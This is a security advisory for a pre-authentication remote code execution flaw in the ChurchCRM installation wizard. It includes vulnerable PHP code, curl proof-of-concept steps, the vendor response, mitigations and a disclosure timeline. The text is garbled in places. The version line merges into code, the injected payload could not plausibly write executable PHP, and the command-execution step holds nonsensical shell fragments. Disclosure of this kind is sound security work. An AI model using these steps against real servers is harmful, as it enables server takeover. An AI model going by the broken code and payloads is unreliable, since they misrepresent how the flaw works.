### Key Information #### Vulnerability Overview - **Vulnerability Type**: Pre-authentication Remote Code Execution (RCE) - **Affected Product**: ChurchCRM versions getParsedBody(); // Lines 40-45: Direct string replacement with user input $template = str_replace('[[DB_PASSWORD]]', $SetupData['DB_PASSWORD'], $template); $template = str_replace('[[HTTP_PATH]]', $SetupData['HTTP_PATH'], $template); $template = str_replace('[[URL]]', $SetupData['URL'], $template); // Line 47: Write user-controlled content to executable PHP file file_put_contents($ConfigDir . '/Config.php', $template); ``` #### Proof of Concept (PoC) 1. Access the installation wizard (no authentication required): ```bash curl 'http://[target]/setup/' ``` 2. Submit malicious payload via form parameters: ```bash curl 'http://[target]/setup/' \ -X POST \ -H 'Content-Type: application/x-www-form-urlencoded' \ -d 'DB_SERVER=www-data&DB_USER=root&DB_PASSWORD=evil' ``` 3. Execute arbitrary commands: ```bash curl 'http://[target]/cmd?whoami' curl 'http://[target]/?some-id' \ -F 'response=$(id|sudo tee /home/data) | gids=$(who-data) groups=$(who-data)' ``` #### Confirmation Results - Successful payload injection and writing to `Config.php` - Remote command execution confirmed via system commands - Full web server user access obtained during installation window #### Vendor Response Analysis - Project contributors acknowledged the issue as "only applicable to new installations" and noted that the specified URL would stop working after installation. However, this assessment does not fully consider: - **Brief window ≠ no risk**: Even a short-lived RCE provides sufficient time for infrastructure compromise - **No data leak ≠ no impact**: Server compromise, backdoor installation, and persistent access have significant consequences - **Only during installation ≠ low severity**: Pre-auth RCE during forced installation phase affects all new deployments #### Mitigation/Workarounds - **Immediate Action**: Restrict network access to the setup wizard during installation - **Recommended Vendor Fixes**: - Implement input validation and sanitization for all setup form parameters - Use parameterized configuration generation instead of string replacement - Add CSRF protection and basic rate limiting to the setup endpoint - Consider moving sensitive configuration generation to a CLI-only tool #### Disclosure Timeline - 2025-09-24: Reported via GitHub Security Advisory GHSA-m8jq-j3p9-2xf3 - 2025-10-04: Project contributors responded, stating the issue "only applies to new installations" - 2025-10-04: Reporter clarified risks of infrastructure compromise during installation window - 2025-10-08: No further vendor response; advisory published to coordinate CVE #### References - [GitHub Security Advisory: GHSA-m8jq-j3p9-2xf3](#) - [ChurchCRM Setup Route: setup/routes/setup.php](#) #### Contact - Reporter: uartu0@gmail.com